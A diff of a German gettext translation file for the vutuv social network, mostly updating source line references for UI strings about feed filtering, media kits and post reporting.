@@ -22210,7 +22210,7 @@ msgstr "Beiträge mit einem dieser Tags werden genauso zugeklappt."
 msgid "Posts containing one of these are folded to a single line — not deleted, and with a way to open them anyway."
 msgstr "Beiträge mit einem dieser Wörter werden auf eine Zeile zugeklappt — nicht gelöscht, und mit einem Weg, sie doch zu lesen."
 
-#: lib/vutuv_web/live/post_live/feed.ex:4154
+#: lib/vutuv_web/live/post_live/feed.ex:4152
 #, elixir-autogen, elixir-format
 msgid "Put away:"
 msgstr "Weggelegt:"
@@ -22249,7 +22249,7 @@ msgid "Show posts by %{name}"
 msgstr "Beiträge von %{name} anzeigen"
 
 #: lib/vutuv_web/live/post_live/feed.ex:852
-#: lib/vutuv_web/live/post_live/feed.ex:4246
+#: lib/vutuv_web/live/post_live/feed.ex:4244
 #, elixir-autogen, elixir-format
 msgid "Sources"
 msgstr "Quellen"
@@ -22288,8 +22288,8 @@ msgid_plural "and %{formatted} more"
 msgstr[0] "und 1 weiterer"
 msgstr[1] "und %{formatted} weitere"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3711
-#: lib/vutuv_web/live/post_live/feed.ex:3738
+#: lib/vutuv_web/live/post_live/feed.ex:3709
+#: lib/vutuv_web/live/post_live/feed.ex:3736
 #, elixir-autogen, elixir-format
 msgctxt "feed filter sheet"
 msgid "Filter"
@@ -22321,7 +22321,7 @@ msgstr ""
 "erscheint, sobald die Prüfung durch ist."
 
 #: lib/vutuv_web/live/organization_live/edit.ex:290
-#: lib/vutuv_web/live/press_kit_live.ex:1225
+#: lib/vutuv_web/live/press_kit_live.ex:1250
 #: lib/vutuv_web/templates/user/edit.html.heex:22
 #, elixir-autogen, elixir-format
 msgid "%{formats}, up to %{limit}"
@@ -22355,7 +22355,7 @@ msgid_plural "%{count} posts on %{day}"
 msgstr[0] "%{count} Beitrag am %{day}"
 msgstr[1] "%{count} Beiträge am %{day}"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3915
+#: lib/vutuv_web/live/post_live/feed.ex:3913
 #, elixir-autogen, elixir-format
 msgid "Back to now"
 msgstr "Zurück zu jetzt"
@@ -22365,7 +22365,7 @@ msgstr "Zurück zu jetzt"
 msgid "Busy month: the shading counts at least this much."
 msgstr "Voller Monat: die Färbung zählt mindestens so viel."
 
-#: lib/vutuv_web/live/post_live/feed.ex:3961
+#: lib/vutuv_web/live/post_live/feed.ex:3959
 #, elixir-autogen, elixir-format
 msgid "Load the whole day (%{formatted} post)"
 msgid_plural "Load the whole day (%{formatted} posts)"
@@ -22387,7 +22387,7 @@ msgstr "Nächster Monat"
 msgid "Next year"
 msgstr "Nächstes Jahr"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3911
+#: lib/vutuv_web/live/post_live/feed.ex:3909
 #, elixir-autogen, elixir-format
 msgid "Nothing reached your feed on %{day}."
 msgstr "Am %{day} ist nichts in Ihrem Feed angekommen."
@@ -22481,7 +22481,7 @@ msgid_plural "New (%{formatted}):"
 msgstr[0] "Neu:"
 msgstr[1] "Neu (%{formatted}):"
 
-#: lib/vutuv_web/components/post_components.ex:3802
+#: lib/vutuv_web/components/post_components.ex:3805
 #, elixir-autogen, elixir-format
 msgid "Quoted post"
 msgstr "Zitierter Beitrag"
@@ -22537,7 +22537,7 @@ msgstr "Nur diese Accounts (leer = alle) …"
 msgid "only %{account}"
 msgstr "nur %{account}"
 
-#: lib/vutuv_web/components/post_components.ex:7600
+#: lib/vutuv_web/components/post_components.ex:7576
 #: lib/vutuv_web/live/post_live/filter_band.ex:290
 #: lib/vutuv_web/live/post_live/filter_band.ex:379
 #, elixir-autogen, elixir-format
@@ -22721,7 +22721,7 @@ msgctxt "phone tab bar"
 msgid "Write"
 msgstr "Schreiben"
 
-#: lib/vutuv_web/live/post_live/feed.ex:4049
+#: lib/vutuv_web/live/post_live/feed.ex:4047
 #: lib/vutuv_web/live/post_rewrites_live.ex:287
 #, elixir-autogen, elixir-format
 msgid "%{formatted} rule"
@@ -22791,7 +22791,7 @@ msgstr "Regeln, die den Text der Beiträge eines Kontos umschreiben, bevor Sie i
 
 #: lib/vutuv_web/components/post_components.ex:1457
 #: lib/vutuv_web/components/post_components.ex:3407
-#: lib/vutuv_web/components/post_components.ex:4766
+#: lib/vutuv_web/components/post_components.ex:4769
 #: lib/vutuv_web/components/ui.ex:5541
 #: lib/vutuv_web/live/post_rewrites_live.ex:76
 #: lib/vutuv_web/live/post_rewrites_live.ex:262
@@ -23022,7 +23022,7 @@ msgstr[1] "%{formatted} neue Follower"
 msgid "Last 30 days: %{parts}"
 msgstr "Letzte 30 Tage: %{parts}"
 
-#: lib/vutuv_web/components/post_components.ex:5328
+#: lib/vutuv_web/components/post_components.ex:5331
 #: lib/vutuv_web/live/notification_live/index.ex:1003
 #, elixir-autogen, elixir-format
 msgid "Less"
@@ -23337,7 +23337,7 @@ msgid "Hidden. What they pass on stays out of your feed; their own posts do not.
 msgstr "Ausgeblendet. Was dieses Konto weiterreicht, erscheint nicht mehr in Ihrem Feed, die eigenen Beiträge schon."
 
 #: lib/vutuv_web/components/post_components.ex:3379
-#: lib/vutuv_web/components/post_components.ex:4760
+#: lib/vutuv_web/components/post_components.ex:4763
 #, elixir-autogen, elixir-format
 msgid "Hide reposts"
 msgstr "Reposts ausblenden"
@@ -23518,8 +23518,8 @@ msgstr "Beiträge in Ihrem Feed"
 msgid "Posts loaded at once"
 msgstr "Beiträge auf einmal"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3985
-#: lib/vutuv_web/live/post_live/feed.ex:3989
+#: lib/vutuv_web/live/post_live/feed.ex:3983
+#: lib/vutuv_web/live/post_live/feed.ex:3987
 #, elixir-autogen, elixir-format
 msgid "Posts per page"
 msgstr "Beiträge pro Seite"
@@ -23534,60 +23534,60 @@ msgstr "Sie können das auch direkt im Feed ändern, gleich unter „Mehr laden�
 msgid "feed length page size posts number amount load more scroll paging seite länge anzahl beiträge nachladen mehr laden umfang"
 msgstr "feed länge seitengröße beiträge anzahl menge mehr laden scrollen blättern seite umfang page size posts number load more"
 
-#: lib/vutuv_web/components/post_components.ex:7591
-#: lib/vutuv_web/components/post_components.ex:7592
+#: lib/vutuv_web/components/post_components.ex:7567
+#: lib/vutuv_web/components/post_components.ex:7568
 #, elixir-autogen, elixir-format
 msgid "A word or phrase …"
 msgstr "Ein Wort oder eine Wortgruppe …"
 
-#: lib/vutuv_web/components/post_components.ex:7619
+#: lib/vutuv_web/components/post_components.ex:7595
 #, elixir-autogen, elixir-format
 msgid "For whom %{thing} is hidden"
 msgstr "Für wen %{thing} ausgeblendet wird"
 
-#: lib/vutuv_web/live/post_live/feed.ex:4046
-#: lib/vutuv_web/live/post_live/feed.ex:4210
-#: lib/vutuv_web/live/post_live/feed.ex:4219
+#: lib/vutuv_web/live/post_live/feed.ex:4044
+#: lib/vutuv_web/live/post_live/feed.ex:4208
+#: lib/vutuv_web/live/post_live/feed.ex:4217
 #, elixir-autogen, elixir-format
 msgid "Hidden"
 msgstr "Ausgeblendet"
 
-#: lib/vutuv_web/live/post_live/feed.ex:4184
+#: lib/vutuv_web/live/post_live/feed.ex:4182
 #, elixir-autogen, elixir-format
 msgid "Hide something from your feed"
 msgstr "Etwas aus dem Feed ausblenden"
 
-#: lib/vutuv_web/components/post_components.ex:7537
+#: lib/vutuv_web/components/post_components.ex:7513
 #, elixir-autogen, elixir-format
 msgid "Stop showing"
 msgstr "Nicht mehr zeigen"
 
-#: lib/vutuv_web/live/post_live/feed.ex:4225
+#: lib/vutuv_web/live/post_live/feed.ex:4223
 #, elixir-autogen, elixir-format
 msgid "Whatever these match is folded to a single line in your feed."
 msgstr "Was hiervon getroffen wird, klappt im Feed auf eine Zeile zu."
 
-#: lib/vutuv_web/live/post_live/feed.ex:4245
+#: lib/vutuv_web/live/post_live/feed.ex:4243
 #, elixir-autogen, elixir-format
 msgid "Words & tags"
 msgstr "Wörter & Tags"
 
-#: lib/vutuv_web/components/post_components.ex:7623
+#: lib/vutuv_web/components/post_components.ex:7599
 #, elixir-autogen, elixir-format
 msgid "everyone"
 msgstr "bei allen"
 
-#: lib/vutuv_web/components/post_components.ex:7626
+#: lib/vutuv_web/components/post_components.ex:7602
 #, elixir-autogen, elixir-format
 msgid "only %{handle}"
 msgstr "nur %{handle}"
 
-#: lib/vutuv_web/components/post_components.ex:7595
+#: lib/vutuv_web/components/post_components.ex:7571
 #, elixir-autogen, elixir-format
 msgid "this word"
 msgstr "dieses Wort"
 
-#: lib/vutuv_web/components/post_components.ex:7636
+#: lib/vutuv_web/components/post_components.ex:7612
 #, elixir-autogen, elixir-format
 msgid "only %{server}"
 msgstr "nur %{server}"
@@ -23639,7 +23639,7 @@ msgstr "Diese Website ist gerade offline."
 msgid "The site itself is running, this address just is not one of ours. The link is probably old, or it carries a typo."
 msgstr "Die Website läuft, nur diese Adresse gibt es hier nicht. Wahrscheinlich ist der Link alt oder enthält einen Tippfehler."
 
-#: lib/vutuv_web/components/post_components.ex:6941
+#: lib/vutuv_web/components/post_components.ex:6944
 #, elixir-autogen, elixir-format
 msgid "Show this screenshot larger"
 msgstr "Screenshot vergrößern"
@@ -23730,7 +23730,7 @@ msgid "Hidden. What other people pass on of them stays out of your feed; their o
 msgstr "Ausgeblendet. Was andere von diesem Konto weiterreichen, erscheint nicht mehr in Ihrem Feed, die eigenen Beiträge schon."
 
 #: lib/vutuv_web/components/post_components.ex:3365
-#: lib/vutuv_web/components/post_components.ex:4748
+#: lib/vutuv_web/components/post_components.ex:4751
 #, elixir-autogen, elixir-format
 msgid "Hide when others repost them"
 msgstr "Ausblenden, wenn andere reposten"
@@ -24493,13 +24493,13 @@ msgstr "das Meldeformular"
 msgid "“%{note}”"
 msgstr "„%{note}“"
 
-#: lib/vutuv_web/components/post_components.ex:5506
+#: lib/vutuv_web/components/post_components.ex:5509
 #: lib/vutuv_web/components/press_kit_components.ex:216
 #, elixir-autogen, elixir-format
 msgid "Show these photos larger"
 msgstr "Fotos vergrößern"
 
-#: lib/vutuv_web/components/post_components.ex:5692
+#: lib/vutuv_web/components/post_components.ex:5695
 #, elixir-autogen, elixir-format
 msgid "Show this photo larger"
 msgstr "Foto vergrößern"
@@ -24518,48 +24518,48 @@ msgid_plural "%{formatted} more entries (%{years})"
 msgstr[0] "Ein weiterer Eintrag (%{years})"
 msgstr[1] "%{formatted} weitere Einträge (%{years})"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1299
+#: lib/vutuv_web/live/press_kit_live.ex:1324
 #, elixir-autogen, elixir-format
 msgid "%{percent}%"
 msgstr "%{percent} %"
 
-#: lib/vutuv_web/live/press_kit_live.ex:847
+#: lib/vutuv_web/live/press_kit_live.ex:872
 #, elixir-autogen, elixir-format
 msgid "%{used} of %{max}"
 msgstr "%{used} von %{max}"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1133
+#: lib/vutuv_web/live/press_kit_live.ex:1158
 #, elixir-autogen, elixir-format
 msgid "A photographer's @handle links to their profile and notifies nobody."
 msgstr "Ein @handle verlinkt auf das Profil des Fotografen und benachrichtigt niemanden."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1218
+#: lib/vutuv_web/live/press_kit_live.ex:1243
 #, elixir-autogen, elixir-format
 msgid "Add a logo variant"
 msgstr "Logo-Variante hinzufügen"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1219
+#: lib/vutuv_web/live/press_kit_live.ex:1244
 #, elixir-autogen, elixir-format
 msgid "Add a press photo"
 msgstr "Pressefoto hinzufügen"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1095
+#: lib/vutuv_web/live/press_kit_live.ex:1120
 #, elixir-autogen, elixir-format
 msgid "At the desk in the Bonn office"
 msgstr "Am Schreibtisch im Bonner Büro"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1127
+#: lib/vutuv_web/live/press_kit_live.ex:1152
 #, elixir-autogen, elixir-format
 msgid "Caption"
 msgstr "Bildunterschrift"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1105
-#: lib/vutuv_web/live/press_kit_live.ex:1170
+#: lib/vutuv_web/live/press_kit_live.ex:1130
+#: lib/vutuv_web/live/press_kit_live.ex:1195
 #, elixir-autogen, elixir-format
 msgid "Credit"
 msgstr "Bildnachweis"
 
-#: lib/vutuv_web/live/press_kit_live.ex:864
+#: lib/vutuv_web/live/press_kit_live.ex:889
 #, elixir-autogen, elixir-format
 msgid "Dark"
 msgstr "Dunkel"
@@ -24569,22 +24569,22 @@ msgstr "Dunkel"
 msgid "Files a journalist may download and print"
 msgstr "Dateien, die eine Redaktion herunterladen und drucken darf"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1016
+#: lib/vutuv_web/live/press_kit_live.ex:1041
 #, elixir-autogen, elixir-format
 msgid "First: the main photo"
 msgstr "An erster Stelle: das Hauptfoto"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1015
+#: lib/vutuv_web/live/press_kit_live.ex:1040
 #, elixir-autogen, elixir-format
 msgid "First: the main variant"
 msgstr "An erster Stelle: die Hauptvariante"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1193
+#: lib/vutuv_web/live/press_kit_live.ex:1218
 #, elixir-autogen, elixir-format
 msgid "I hold the rights to this file and release it for editorial use, as long as the credit above is shown."
 msgstr "Ich habe die Rechte an dieser Datei und gebe sie zur redaktionellen Nutzung frei, solange der Bildnachweis oben genannt wird."
 
-#: lib/vutuv_web/live/press_kit_live.ex:864
+#: lib/vutuv_web/live/press_kit_live.ex:889
 #, elixir-autogen, elixir-format
 msgid "Light"
 msgstr "Hell"
@@ -24596,13 +24596,13 @@ msgstr "Logo-Variante"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:123
 #: lib/vutuv_web/agent_docs/text.ex:414
-#: lib/vutuv_web/live/press_kit_live.ex:838
+#: lib/vutuv_web/live/press_kit_live.ex:863
 #: lib/vutuv_web/templates/press_kit/index.html.heex:55
 #, elixir-autogen, elixir-format
 msgid "Logo variants"
 msgstr "Logo-Varianten"
 
-#: lib/vutuv_web/live/press_kit_live.ex:878
+#: lib/vutuv_web/live/press_kit_live.ex:903
 #, elixir-autogen, elixir-format
 msgid "No logo here yet."
 msgstr "Hier ist noch kein Logo."
@@ -24617,13 +24617,13 @@ msgstr "Höchstens %{max} Logo-Varianten."
 msgid "No more than %{max} press photos."
 msgstr "Höchstens %{max} Pressefotos."
 
-#: lib/vutuv_web/live/press_kit_live.ex:879
+#: lib/vutuv_web/live/press_kit_live.ex:904
 #, elixir-autogen, elixir-format
 msgid "No press photo here yet."
 msgstr "Hier ist noch kein Pressefoto."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1114
-#: lib/vutuv_web/live/press_kit_live.ex:1180
+#: lib/vutuv_web/live/press_kit_live.ex:1139
+#: lib/vutuv_web/live/press_kit_live.ex:1205
 #, elixir-autogen, elixir-format
 msgid "Photo: Ada King"
 msgstr "Foto: Ada King"
@@ -24633,7 +24633,7 @@ msgstr "Foto: Ada King"
 msgid "Picture removed."
 msgstr "Bild entfernt."
 
-#: lib/vutuv_web/live/press_kit_live.ex:537
+#: lib/vutuv_web/live/press_kit_live.ex:562
 #, elixir-autogen, elixir-format
 msgid "Please confirm the rights first, then choose the file."
 msgstr "Bitte bestätigen Sie zuerst die Rechte und wählen Sie dann die Datei."
@@ -24645,63 +24645,63 @@ msgstr "Pressefoto"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:122
 #: lib/vutuv_web/agent_docs/text.ex:413
-#: lib/vutuv_web/live/press_kit_live.ex:838
+#: lib/vutuv_web/live/press_kit_live.ex:863
 #: lib/vutuv_web/templates/press_kit/index.html.heex:46
 #, elixir-autogen, elixir-format
 msgid "Press photos"
 msgstr "Pressefotos"
 
-#: lib/vutuv_web/live/press_kit_live.ex:862
+#: lib/vutuv_web/live/press_kit_live.ex:887
 #, elixir-autogen, elixir-format
 msgid "Show tiles on:"
 msgstr "Kacheln zeigen auf:"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1117
+#: lib/vutuv_web/live/press_kit_live.ex:1142
 #, elixir-autogen, elixir-format
 msgid "Shown beside the picture and asked for with every download."
 msgstr "Steht neben dem Bild und wird bei jedem Download genannt."
 
-#: lib/vutuv_web/live/press_kit_live.ex:550
+#: lib/vutuv_web/live/press_kit_live.ex:575
 #, elixir-autogen, elixir-format
 msgid "That could not be saved."
 msgstr "Das konnte nicht gespeichert werden."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1338
+#: lib/vutuv_web/live/press_kit_live.ex:1363
 #, elixir-autogen, elixir-format
 msgid "The first photo is the one shown first. Drag a tile, or use the arrows, to change the order."
 msgstr "Das erste Foto wird zuerst gezeigt. Ziehen Sie eine Kachel oder nutzen Sie die Pfeile, um die Reihenfolge zu ändern."
 
-#: lib/vutuv_web/live/press_kit_live.ex:947
+#: lib/vutuv_web/live/press_kit_live.ex:972
 #, elixir-autogen, elixir-format
 msgid "This shelf is full. Remove one picture to add another."
 msgstr "Hier ist kein Platz mehr. Entfernen Sie ein Bild, um ein weiteres hinzuzufügen."
 
-#: lib/vutuv_web/live/press_kit_live.ex:797
+#: lib/vutuv_web/live/press_kit_live.ex:822
 #, elixir-autogen, elixir-format
 msgid "What a journalist writing about you may download: photos in print quality and your logo as a file. Everything here is public and free for editorial use as long as your credit is shown."
 msgstr "Was eine Redaktion, die über Sie schreibt, herunterladen darf: Fotos in Druckqualität und Ihr Logo als Datei. Alles hier ist öffentlich und zur redaktionellen Nutzung frei, solange Ihr Bildnachweis genannt wird."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1083
+#: lib/vutuv_web/live/press_kit_live.ex:1108
 #, elixir-autogen, elixir-format
 msgid "What the picture shows"
 msgstr "Was das Bild zeigt"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1082
+#: lib/vutuv_web/live/press_kit_live.ex:1107
 #, elixir-autogen, elixir-format
 msgid "Which variant this is"
 msgstr "Um welche Variante es sich handelt"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1094
+#: lib/vutuv_web/live/press_kit_live.ex:1119
 #, elixir-autogen, elixir-format
 msgid "White on a dark background"
 msgstr "Weiß auf dunklem Grund"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1128
+#: lib/vutuv_web/live/press_kit_live.ex:1153
 #, elixir-autogen, elixir-format
 msgid "Who took it, where, and what may be cropped."
 msgstr "Wer es aufgenommen hat, wo, und was beschnitten werden darf."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1330
+#: lib/vutuv_web/live/press_kit_live.ex:1355
 #, elixir-autogen, elixir-format
 msgid "Your logo as a file, one tile per variant. A vector (SVG) is what a printer asks for; a PNG is what everybody else can open."
 msgstr "Ihr Logo als Datei, eine Kachel je Variante. Eine Druckerei fragt nach einem Vektor (SVG), alle anderen können ein PNG öffnen."
@@ -24718,14 +24718,14 @@ msgid_plural "%{count} bytes"
 msgstr[0] "%{count} Byte"
 msgstr[1] "%{count} Bytes"
 
-#: lib/vutuv_web/agent_docs/markdown.ex:1560
-#: lib/vutuv_web/agent_docs/text.ex:993
+#: lib/vutuv_web/agent_docs/markdown.ex:1564
+#: lib/vutuv_web/agent_docs/text.ex:995
 #, elixir-autogen, elixir-format
 msgid "Credit: %{credit}"
 msgstr "Bildnachweis: %{credit}"
 
-#: lib/vutuv_web/components/press_kit_components.ex:380
-#: lib/vutuv_web/components/press_kit_components.ex:383
+#: lib/vutuv_web/components/press_kit_components.ex:386
+#: lib/vutuv_web/components/press_kit_components.ex:389
 #, elixir-autogen, elixir-format
 msgid "Download %{format}"
 msgstr "%{format} herunterladen"
@@ -24735,12 +24735,12 @@ msgstr "%{format} herunterladen"
 msgid "Download photo"
 msgstr "Foto herunterladen"
 
-#: lib/vutuv/press_kit.ex:788
+#: lib/vutuv/press_kit.ex:811
 #, elixir-autogen, elixir-format
 msgid "Free for editorial use with credit."
 msgstr "Zur freien redaktionellen Verwendung mit Bildnachweis."
 
-#: lib/vutuv_web/agent_docs/markdown.ex:1563
+#: lib/vutuv_web/agent_docs/markdown.ex:1567
 #, elixir-autogen, elixir-format
 msgid "PNG version"
 msgstr "PNG-Fassung"
@@ -24760,27 +24760,27 @@ msgstr "Diese Bilder stehen für die redaktionelle Verwendung bereit. Nutzen Sie
 msgid "Video is being checked"
 msgstr "Video wird geprüft"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1251
+#: lib/vutuv_web/live/press_kit_live.ex:1276
 #, elixir-autogen, elixir-format
 msgid "Copies the vector file this page's logo was uploaded as onto this shelf."
 msgstr "Kopiert die Vektordatei, als die das Logo dieser Seite hochgeladen wurde, hierher."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1324
+#: lib/vutuv_web/live/press_kit_live.ex:1349
 #, elixir-autogen, elixir-format
 msgid "The page's logo as a file, one tile per variant. A vector (SVG) is what a printer asks for; a PNG is what everybody else can open."
 msgstr "Das Logo dieser Seite als Datei, eine Kachel je Variante. Eine Druckerei fragt nach einem Vektor (SVG), alle anderen können ein PNG öffnen."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1248
+#: lib/vutuv_web/live/press_kit_live.ex:1273
 #, elixir-autogen, elixir-format
 msgid "Use the page's own logo"
 msgstr "Logo dieser Seite verwenden"
 
-#: lib/vutuv_web/live/press_kit_live.ex:779
+#: lib/vutuv_web/live/press_kit_live.ex:804
 #, elixir-autogen, elixir-format
 msgid "What a journalist writing about this page may download: photos in print quality and its logo as a file. Everything here is public and free for editorial use as long as the credit is shown."
 msgstr "Was eine Redaktion, die über diese Seite schreibt, herunterladen darf: Fotos in Druckqualität und das Logo als Datei. Alles hier ist öffentlich und zur redaktionellen Nutzung frei, solange der Bildnachweis genannt wird."
 
-#: lib/vutuv_web/components/press_kit_components.ex:570
+#: lib/vutuv_web/components/press_kit_components.ex:607
 #: lib/vutuv_web/components/ui.ex:3281
 #, elixir-autogen, elixir-format
 msgid "Report this picture"
@@ -24908,12 +24908,12 @@ msgstr "Media Kit"
 msgid "Media Kit of %{name}"
 msgstr "Media Kit von %{name}"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1344
+#: lib/vutuv_web/live/press_kit_live.ex:1369
 #, elixir-autogen, elixir-format
 msgid "Remove this picture from this page's Media Kit?"
 msgstr "Dieses Bild aus dem Media Kit dieser Seite entfernen?"
 
-#: lib/vutuv_web/live/press_kit_live.ex:1346
+#: lib/vutuv_web/live/press_kit_live.ex:1371
 #, elixir-autogen, elixir-format
 msgid "Remove this picture from your Media Kit?"
 msgstr "Dieses Bild aus Ihrem Media Kit entfernen?"
@@ -24933,8 +24933,8 @@ msgstr "Sie können diesem Media Kit kein Bild hinzufügen."
 msgid "press kit media journalist photographer download original print logo svg credit copyright presse pressefotos pressemappe medienkit mediakit fotos logo herunterladen bildnachweis"
 msgstr "media kit medienkit mediakit pressemappe presse medien redaktion journalist fotograf download original druck logo svg bildnachweis urheberrecht pressefotos herunterladen press kit"
 
-#: lib/vutuv_web/components/post_components.ex:4664
-#: lib/vutuv_web/components/post_components.ex:4714
+#: lib/vutuv_web/components/post_components.ex:4667
+#: lib/vutuv_web/components/post_components.ex:4717
 #, elixir-autogen, elixir-format
 msgid "Copy link to post"
 msgstr "Link zum Beitrag kopieren"
@@ -25023,14 +25023,14 @@ msgstr "Ihr Upload-Kontingent für heute ist aufgebraucht. Es wird im Lauf des T
 msgid "Your uploads are not limited."
 msgstr "Ihre Uploads sind nicht begrenzt."
 
-#: lib/vutuv_web/live/press_kit_live.ex:672
+#: lib/vutuv_web/live/press_kit_live.ex:697
 #, elixir-autogen, elixir-format
 msgid "%{formatted} word"
 msgid_plural "%{formatted} words"
 msgstr[0] "%{formatted} Wort"
 msgstr[1] "%{formatted} Wörter"
 
-#: lib/vutuv_web/live/press_kit_live.ex:756
+#: lib/vutuv_web/live/press_kit_live.ex:781
 #, elixir-autogen, elixir-format
 msgid "A paragraph an article can end on."
 msgstr "Ein Absatz, mit dem ein Artikel enden kann."
@@ -25042,22 +25042,22 @@ msgstr "Ein Absatz, mit dem ein Artikel enden kann."
 msgid "About %{name}"
 msgstr "Über %{name}"
 
-#: lib/vutuv_web/live/press_kit_live.ex:749
+#: lib/vutuv_web/live/press_kit_live.ex:774
 #, elixir-autogen, elixir-format
 msgid "About %{words} words. A paragraph at the end of an article."
 msgstr "Etwa %{words} Wörter. Ein Absatz am Ende eines Artikels."
 
-#: lib/vutuv_web/live/press_kit_live.ex:743
+#: lib/vutuv_web/live/press_kit_live.ex:768
 #, elixir-autogen, elixir-format
 msgid "About %{words} words. The two sentences under a photo."
 msgstr "Etwa %{words} Wörter. Die zwei Sätze unter einem Foto."
 
-#: lib/vutuv_web/live/press_kit_live.ex:723
+#: lib/vutuv_web/live/press_kit_live.ex:748
 #, elixir-autogen, elixir-format
 msgid "An @handle links to that profile and notifies nobody."
 msgstr "Ein @handle verlinkt auf das Profil und benachrichtigt niemanden."
 
-#: lib/vutuv_web/live/press_kit_live.ex:753
+#: lib/vutuv_web/live/press_kit_live.ex:778
 #, elixir-autogen, elixir-format
 msgid "As long as you like. The whole portrait."
 msgstr "So lang, wie Sie mögen. Das ganze Porträt."
@@ -25072,7 +25072,7 @@ msgstr "Lange Fassung"
 msgid "Medium version"
 msgstr "Mittlere Fassung"
 
-#: lib/vutuv_web/live/press_kit_live.ex:681
+#: lib/vutuv_web/live/press_kit_live.ex:706
 #, elixir-autogen, elixir-format
 msgid "Nothing written yet."
 msgstr "Noch nichts geschrieben."
@@ -25087,22 +25087,22 @@ msgstr "Kurze Fassung"
 msgid "Take whichever length fits the space you have. Each one stands on its own."
 msgstr "Nehmen Sie die Fassung, die in Ihren Platz passt. Jede steht für sich."
 
-#: lib/vutuv_web/live/press_kit_live.ex:757
+#: lib/vutuv_web/live/press_kit_live.ex:782
 #, elixir-autogen, elixir-format
 msgid "The whole story, for as long as it needs."
 msgstr "Die ganze Geschichte, so lang sie sein muss."
 
-#: lib/vutuv_web/live/press_kit_live.ex:630
+#: lib/vutuv_web/live/press_kit_live.ex:655
 #, elixir-autogen, elixir-format
 msgid "Three bios in three lengths, so a journalist can take the one that fits. You write them; nothing is made out of your CV."
 msgstr "Drei Biografien in drei Längen, damit eine Redaktion die passende nehmen kann. Sie schreiben sie selbst; aus Ihrem Lebenslauf wird nichts gebaut."
 
-#: lib/vutuv_web/live/press_kit_live.ex:755
+#: lib/vutuv_web/live/press_kit_live.ex:780
 #, elixir-autogen, elixir-format
 msgid "Two sentences a caption can carry."
 msgstr "Zwei Sätze, die in eine Bildunterschrift passen."
 
-#: lib/vutuv_web/live/press_kit_live.ex:691
+#: lib/vutuv_web/live/press_kit_live.ex:716
 #, elixir-autogen, elixir-format
 msgid "Write"
 msgstr "Schreiben"
@@ -25212,7 +25212,7 @@ msgstr "abgelehnt"
 msgid "Your post appears as soon as the video is ready"
 msgstr "Ihr Beitrag erscheint, sobald das Video fertig ist"
 
-#: lib/vutuv_web/components/post_components.ex:3649
+#: lib/vutuv_web/components/post_components.ex:3653
 #, elixir-autogen, elixir-format
 msgid "Found through %{server}"
 msgstr "Gefunden über %{server}"
@@ -25411,22 +25411,22 @@ msgstr[1] "%{tag} folgen. Heute %{uses} Beiträge auf %{servers} Servern, an ein
 msgid "Very busy on other servers right now:"
 msgstr "Gerade sehr aktiv auf anderen Servern:"
 
-#: lib/vutuv_web/live/press_kit_live.ex:904
+#: lib/vutuv_web/live/press_kit_live.ex:929
 #, elixir-autogen, elixir-format
 msgid "A picture still being checked is not public yet."
 msgstr "Ein Bild, das noch geprüft wird, ist noch nicht öffentlich."
 
-#: lib/vutuv_web/live/press_kit_live.ex:907
+#: lib/vutuv_web/live/press_kit_live.ex:932
 #, elixir-autogen, elixir-format
 msgid "A visitor sees a pixelated stand-in in its place and can download nothing. The mark goes by itself when the check is through."
 msgstr "Besucher sehen an seiner Stelle eine verpixelte Vorschau und können nichts herunterladen. Die Markierung verschwindet von selbst, sobald die Prüfung abgeschlossen ist."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1269
+#: lib/vutuv_web/live/press_kit_live.ex:1294
 #, elixir-autogen, elixir-format
 msgid "Logo variants, further down this page, take this format."
 msgstr "Logo-Varianten, weiter unten auf dieser Seite, nehmen dieses Format."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1268
+#: lib/vutuv_web/live/press_kit_live.ex:1293
 #, elixir-autogen, elixir-format
 msgid "Press photos, further up this page, take this format."
 msgstr "Pressefotos, weiter oben auf dieser Seite, nehmen dieses Format."
@@ -25501,7 +25501,7 @@ msgstr "Dieses Bild konnte nicht gelesen werden."
 msgid "You can only send files to members you are connected with."
 msgstr "Dateien können Sie nur an Mitglieder senden, mit denen Sie vernetzt sind."
 
-#: lib/vutuv_web/components/post_components.ex:3739
+#: lib/vutuv_web/components/post_components.ex:3742
 #, elixir-autogen, elixir-format
 msgid "Report this post as not appropriate? Every copy of it disappears right away, for everyone on this vutuv."
 msgstr "Diesen Beitrag als unangemessen melden? Jede Kopie verschwindet sofort für alle auf diesem vutuv."
@@ -25511,7 +25511,7 @@ msgstr "Diesen Beitrag als unangemessen melden? Jede Kopie verschwindet sofort f
 msgid "Thank you. Every copy on this vutuv is gone."
 msgstr "Danke. Jede Kopie auf diesem vutuv ist weg."
 
-#: lib/vutuv_web/components/post_components.ex:3744
+#: lib/vutuv_web/components/post_components.ex:3747
 #, elixir-autogen, elixir-format
 msgid "Report this post as not appropriate? This copy disappears right away, for everyone on this vutuv. Copies other servers sent us stay."
 msgstr "Diesen Beitrag als unangemessen melden? Diese Kopie verschwindet sofort für alle auf diesem vutuv. Kopien von anderen Servern bleiben stehen."
@@ -25591,7 +25591,22 @@ msgstr "ein Inhalt von %{page} auf vutuv wurde gemeldet."
